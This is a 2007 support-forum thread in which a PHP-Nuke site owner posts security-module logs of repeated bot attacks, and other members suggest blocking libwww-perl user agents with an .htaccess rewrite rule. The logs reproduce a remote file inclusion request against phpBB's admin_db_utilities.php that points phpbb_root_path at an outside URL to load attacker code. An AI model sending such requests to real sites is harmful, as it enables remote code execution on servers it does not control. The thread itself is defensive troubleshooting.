Ravens PHP Scripts: Forums
 

 
  Forum Index  •  Forum FAQ  •  Search  •  Memberlist  •  Usergroups  •  Profile  •  Log in to check your private messages  •  Log in

Getting hmajor hack attempts every 10mins
 View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm) v2.5.x
Author Message
ozbutcher
Worker
Worker



Joined: Jan 17, 2007
Posts: 170
PostPosted: Mon May 07, 2007 6:29 am Reply with quote
So far I've gotten about 10 emails (within the last 60 minutes). all of them seems to have the same link but different ip addresses. here is one of the messages I got:

Code:
Date & Time: 2007-05-07 12:21:09 UTC GMT +0000


Blocked IP: 195.210.43.*


User ID: Anonymous (1)


Reason: Abuse-Filter


--------------------


User Agent: libwww-perl/5.79


Query String: www.burnt-clan.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://pulze.us/tmp/a?


Get String: www.burnt-clan.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://pulze.us/tmp/a?


Post String: www.burnt-clan.com/modules/Forums/admin/admin_db_utilities.php


Forwarded For: none


Client IP: none


Remote Address: 195.210.43.214


Remote Port: 59546


Request Method: GET


--------------------


Who-Is for IP


195.210.43.214 


does anyone know whats going on Sad I'm seriously considering removing myself from the email list cause I'm getting a lot of these messages daily.
 
View user's profile Send private message
ozbutcher
PostPosted: Mon May 07, 2007 6:40 am Reply with quote
another one again just now Sad

Code:
Date & Time: 2007-05-07 12:36:18 UTC GMT +0000


Blocked IP: 203.121.175.*


User ID: Anonymous (1)


Reason: Abuse-Filter


--------------------


User Agent: libwww-perl/5.805


Query String: www.burnt-clan.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://pulze.us/tmp/a?


Get String: www.burnt-clan.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://pulze.us/tmp/a?


Post String: www.burnt-clan.com/modules/Forums/admin/admin_db_utilities.php


Forwarded For: none


Client IP: none


Remote Address: 203.121.175.179


Remote Port: 48051


Request Method: GET


--------------------


Who-Is for IP


203.121.175.179 
 
FireATST
RavenNuke(tm) Development Team



Joined: Jun 12, 2004
Posts: 654
Location: Ohio
PostPosted: Mon May 07, 2007 7:00 am Reply with quote
libwww-perl/ I used this for search and there is numerous posts on this subject that should help you out..... Smile
 
View user's profile Send private message Visit poster's website MSN Messenger ICQ Number
ozbutcher
PostPosted: Mon May 07, 2007 8:43 am Reply with quote
ah there are so many posts! I do not know which is the right one for me Sad

I found one where raven says we need to put a .htaccess and .staccess into the \modules\forums\admin directory.

my question about that is... can point the .htaccess to the .staccess that nuke sentinel makes for my super admins? that way I don't have to keep updating the .staccess?

or am I looking at the wrong fix?
 
hitwalker
Sells PC To Pay For Divorce



Joined:
Posts: 5661
PostPosted: Mon May 07, 2007 8:55 am Reply with quote
you have to follow the fix raven posted....
and just update admins ...where needed....
 
View user's profile Send private message
wiz
Involved
Involved



Joined: Oct 09, 2006
Posts: 413
Location: UK
PostPosted: Wed May 09, 2007 7:13 am Reply with quote
You are not alone, ive had over 50 attacks over the last couple of days from exactly the same script path. Senti is blocking, which is good. But you could just turn the email function off for the filter blocking.

Any chance of a link to that fix topic? Please
 
View user's profile Send private message Visit poster's website AIM Address
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221
PostPosted: Wed May 09, 2007 11:37 pm Reply with quote
Save yourself the headache, block "libwww-perl" user agents completely from your site using .htaccess

Bots use the libwww perl functions in order to spread themselves and take over sites. You are better safe to deny them access completely.

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
montego
Site Admin



Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
PostPosted: Thu May 10, 2007 5:57 am Reply with quote
It has been documented before, but here is an example of what evaders is talking about:

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ http://127.0.0.1 [R,L]

This requires that mod_rewrite is working on your installation (many threads on this subject).

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm) v2.5.x


 Jump to:   




View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©